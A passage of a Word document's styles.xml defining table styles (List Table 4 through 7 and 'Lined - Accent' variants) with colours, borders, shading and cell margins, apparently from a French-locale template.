    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5EED5" w:themeFill="accent3" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable4-Accent4">
    <w:name w:val="List Table 4 - Accent 4"/>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DFD8E7" w:themeFill="accent4" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DFD8E7" w:themeFill="accent4" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable4-Accent5">
    <w:name w:val="List Table 4 - Accent 5"/>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D1EAF0" w:themeFill="accent5" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D1EAF0" w:themeFill="accent5" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable4-Accent6">
    <w:name w:val="List Table 4 - Accent 6"/>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FDE4D0" w:themeFill="accent6" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE4D0" w:themeFill="accent6" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauListe5Fonc">
    <w:name w:val="List Table 5 Dark"/>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0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="light1"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="000000" w:themeColor="text1"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto"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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="light1"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="C0504D" w:themeColor="accent2"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto"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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="light1"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto"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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="light1"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="8064A2" w:themeColor="accent4"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto"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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="light1"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto"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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="light1"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="32" w:space="0" w:color="F79646" w:themeColor="accent6"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto"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eauListe6Couleur">
    <w:name w:val="List Table 6 Colorful"/>
    <w:uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="text1" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable6Colorful-Accent1">
    <w:name w:val="List Table 6 Colorful - Accent 1"/>
    <w:uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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color w:val="2A4A71" w:themeColor="accent1" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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color w:val="D99695" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="C3D69B" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="B2A1C6" w:themeColor="accent4" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="92CCDC" w:themeColor="accent5" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="FAC090" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE4D0" w:themeFill="accent6" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="FAC090" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauListe7Couleur">
    <w:name w:val="List Table 7 Colorful"/>
    <w:uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>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auto" w:fill="FFFFFF" w:themeFill="light1"/>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auto"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color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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Borders>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>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color w:val="2A4A71" w:themeColor="accent1" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="D99695" w:themeColor="accent2" w:themeTint="97"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="D99695" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0504D" w:themeColor="accent2"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="D99695" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="C0504D" w:themeColor="accent2"/>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D99695" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="C0504D" w:themeColor="accent2"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:color w:val="D99695" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="C0504D" w:themeColor="accent2"/>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color w:val="D99695" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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Borders>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="C3D69B" w:themeColor="accent3" w:themeTint="98"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="C3D69B" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="C3D69B" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>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C3D69B" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:color w:val="C3D69B" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>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color w:val="C3D69B" w:themeColor="accent3" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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Borders>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="B2A1C6" w:themeColor="accent4" w:themeTint="9A"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="B2A1C6" w:themeColor="accent4" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8064A2" w:themeColor="accent4"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="B2A1C6" w:themeColor="accent4" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="8064A2" w:themeColor="accent4"/>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B2A1C6" w:themeColor="accent4" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="8064A2" w:themeColor="accent4"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:color w:val="B2A1C6" w:themeColor="accent4" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="8064A2" w:themeColor="accent4"/>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color w:val="B2A1C6" w:themeColor="accent4" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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Borders>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="92CCDC" w:themeColor="accent5" w:themeTint="9A"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="92CCDC" w:themeColor="accent5" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="92CCDC" w:themeColor="accent5" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>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92CCDC" w:themeColor="accent5" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:color w:val="92CCDC" w:themeColor="accent5" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>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color w:val="92CCDC" w:themeColor="accent5" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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Borders>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="FAC090" w:themeColor="accent6" w:themeTint="98"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="FAC090" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:i/>
        <w:color w:val="FAC090" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:i/>
        <w:color w:val="FAC090" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:color w:val="FAC090" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>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color w:val="FAC090" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE4D0" w:themeFill="accent6" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="FAC090" w:themeColor="accent6" w:themeTint="98" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Lined-Accent">
    <w:name w:val="Lined - Accent"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>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StylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="text1" w:themeFillTint="0D"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Lined-Accent1">
    <w:name w:val="Lined - Accent 1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="404040"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="F2F2F2"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
